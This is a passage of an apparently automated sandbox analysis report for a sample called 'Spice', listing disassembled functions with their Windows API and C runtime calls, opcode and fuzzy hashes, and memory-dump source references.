                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00EC0375
                                                                                                                                                                                                                                        • Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4
                                                                                                                                                                                                                                        • Part of subcall function 00E909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E909E4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                                                                                                                                      • Opcode ID: dbc62daad0ae2ff76957bfbe22fce628f00f9b9246b78c2f97ed7c4a44a2dd06
                                                                                                                                                                                                                                      • Instruction ID: 976d4c6913327ad081c0d32efa991dc301afebb57f644c1962ecd32626ac3838
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbc62daad0ae2ff76957bfbe22fce628f00f9b9246b78c2f97ed7c4a44a2dd06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC21C671A002989BCF41DFD4D805BEE7BFC9F49704F00405AE408B7241DBB55989DFA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: de7a29f057755198c8263472c6f47e55c391797aaedf91c2d364fee52fffddee
                                                                                                                                                                                                                                      • Instruction ID: 40f8a5d21d0b579d084d63a65ab4326d154e934816c7b201eb563bc7fa799d13
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de7a29f057755198c8263472c6f47e55c391797aaedf91c2d364fee52fffddee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F13C705083459FC714DF29C984A6ABBE5FF88314F14992DF899AB391D730E945CF82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                      • Opcode ID: 7e161629f256978e0801599d1795c9ec4bd3653011adcda4446e7829245f9baf
                                                                                                                                                                                                                                      • Instruction ID: 5723466a381ade5317c528eef0f81c6454b0f811cc750fb4d46bfac317ed3e0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e161629f256978e0801599d1795c9ec4bd3653011adcda4446e7829245f9baf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2461DE71600209EBDF049F25D880AAE7BB8FF44310F1591A9EC5DDF294EB31DA61DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E907EC
                                                                                                                                                                                                                                        • Part of subcall function 00E907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E907F4
                                                                                                                                                                                                                                        • Part of subcall function 00E907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E907FF
                                                                                                                                                                                                                                        • Part of subcall function 00E907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E9080A
                                                                                                                                                                                                                                        • Part of subcall function 00E907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E90812
                                                                                                                                                                                                                                        • Part of subcall function 00E907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9081A
                                                                                                                                                                                                                                        • Part of subcall function 00E8FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E7AC6B), ref: 00E8FFA7
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E7AD08
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00E7AD85
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EB2F56
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1986988660-0
                                                                                                                                                                                                                                      • Opcode ID: 7fa699935e95bac1d3194b2cedf65d314ea3b810e2fb55bd6eaa61d5bf75b891
                                                                                                                                                                                                                                      • Instruction ID: f87ca2e83ef9d6ab8c99d7ca0e59e7429ff01f9da7caa55d3ee24db184526016
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fa699935e95bac1d3194b2cedf65d314ea3b810e2fb55bd6eaa61d5bf75b891
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB81A8F0908388CEC3A8FF29ED446597EEAEB59334710916AD458D72B2EB306405FF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00E859F9
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E85A9E
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E85ABB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1505330794-0
                                                                                                                                                                                                                                      • Opcode ID: 11c6a256dbab9dcc2636d97b9ed2520712b64bea3533c42d82c3b4dff0aededb
                                                                                                                                                                                                                                      • Instruction ID: 834a51551708f591e6bc549952a08e255227e149f253593d7c27f03273907ba0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11c6a256dbab9dcc2636d97b9ed2520712b64bea3533c42d82c3b4dff0aededb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2318FB1505705CFC724EF34D8C4697BBE8FB48318F001A6EF99EA2240EB71A944DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00E95953
                                                                                                                                                                                                                                        • Part of subcall function 00E9A39B: __NMSG_WRITE.LIBCMT ref: 00E9A3C2
                                                                                                                                                                                                                                        • Part of subcall function 00E9A39B: __NMSG_WRITE.LIBCMT ref: 00E9A3CC
                                                                                                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 00E9595A
                                                                                                                                                                                                                                        • Part of subcall function 00E9A3F8: GetModuleFileNameW.KERNEL32(00000000,00F353BA,00000104,00000004,00000001,00E91003), ref: 00E9A48A
                                                                                                                                                                                                                                        • Part of subcall function 00E9A3F8: ___crtMessageBoxW.LIBCMT ref: 00E9A538
                                                                                                                                                                                                                                        • Part of subcall function 00E932CF: ___crtCorExitProcess.LIBCMT ref: 00E932D5
                                                                                                                                                                                                                                        • Part of subcall function 00E932CF: ExitProcess.KERNEL32 ref: 00E932DE
                                                                                                                                                                                                                                        • Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,?,00000004,?,?,00E91003,?), ref: 00E9597F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1372826849-0
                                                                                                                                                                                                                                      • Opcode ID: 3a9f81f3f9c6ddcbc3b15e91766d16e4b9b9810e6f1cfcad9b4bb0cc72c2b6fc
                                                                                                                                                                                                                                      • Instruction ID: 7d2c646740ce339d5b3bb3af70a618b46946933c3e21011b4de0f0ae53e572de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a9f81f3f9c6ddcbc3b15e91766d16e4b9b9810e6f1cfcad9b4bb0cc72c2b6fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B01B133241B16EAFE126B349C42B6E32999FD2774F51212BF429BB2E1DE708D4047A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED92D6
                                                                                                                                                                                                                                        • Part of subcall function 00E92F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92F99
                                                                                                                                                                                                                                        • Part of subcall function 00E92F85: GetLastError.KERNEL32(00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92FAB
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED92E7
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00ED92F9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                                                                                                                      • Instruction ID: 028a8801029e4003dc66998a1aa99133e25ef4e4514c5246376f5f85a53aeab7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE012A170560267CE24A5797D80ED777FC8F88755715251EB50AF7643CE24E8428168
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                                                                                      • API String ID: 0-4196123274
                                                                                                                                                                                                                                      • Opcode ID: 4814932df57c998867d540834c26ff2625604ca8184cafd6af584873604398d0
                                                                                                                                                                                                                                      • Instruction ID: 6bdfddba14b48c8bc9b935d83966da7a83b06f6a04b98a8d4e2b11be2e7a102d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4814932df57c998867d540834c26ff2625604ca8184cafd6af584873604398d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1324A70608741DFCB24DF14C494A6AB7E1FF89308F14A55DE88AAB362D735EC45DB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID: EA06
                                                                                                                                                                                                                                      • API String ID: 4104443479-3962188686
                                                                                                                                                                                                                                      • Opcode ID: 65d858c1c55233dc80d8cf5c54c51543b0af55231000e4c2b4f67368049f71a1
                                                                                                                                                                                                                                      • Instruction ID: 7f80a3d76a8314edbf64e2a4783cbc906fb27501fc06382fb810c4d5c4b35491
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65d858c1c55233dc80d8cf5c54c51543b0af55231000e4c2b4f67368049f71a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25419FA2A0415A9BDF35AB5488517FF7BE5CB85300F5460B5F88DFB2C6D5218D4083E1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _strcat.LIBCMT ref: 00EEE20C
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00EEE29B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1012013722-0
                                                                                                                                                                                                                                      • Opcode ID: 81e04df74ca01ce7e865647e134c7729feb4b0731088612466d04d53e746c0a6
                                                                                                                                                                                                                                      • Instruction ID: 7aba95d975b6e8cdddb981a0650218cd60e5b36c06dbd957d431db8c0f8125b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81e04df74ca01ce7e865647e134c7729feb4b0731088612466d04d53e746c0a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F913935A00608DFCB28DF19C5819ADB7E5FF49314B55E05AE85AAF3A2DB30ED41CB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00ED68EC
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00ED690A
                                                                                                                                                                                                                                        • Part of subcall function 00ED6A73: _memmove.LIBCMT ref: 00ED6B01
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                      • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                                                                                                                                                                      • Instruction ID: b3d312c2e3cb353583cd83a7804354796448ad4e2145606a75869867c83be088
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 467192716006049FCB249F54C955BAAB7E5EF84328F24E50AE8D93B392CB35AD42CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00ED614E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                                                                                      • Opcode ID: 251895289edad88d1cb58a5c1f69941622c0918037ae4a4ac99a79452beac875
                                                                                                                                                                                                                                      • Instruction ID: f50c63ae514c7db62afd63399649b5ae85cd284991e72cc0dc29f8c32a5b98ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 251895289edad88d1cb58a5c1f69941622c0918037ae4a4ac99a79452beac875
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B341B4B6600209AFDB21EFA4C8819AEB3F8EB44354B10552FE55AA7351EB309A46CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                      • Opcode ID: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
                                                                                                                                                                                                                                      • Instruction ID: 48671fb0cd8a66498edbdf816f48390408ca8dd95e6a82907c7edeea408c930d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3341C8725082099FCB10EFA8D881DBEB7E9EF49344B64549EE5C5B7381EB719D02C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32 ref: 00E90ED5
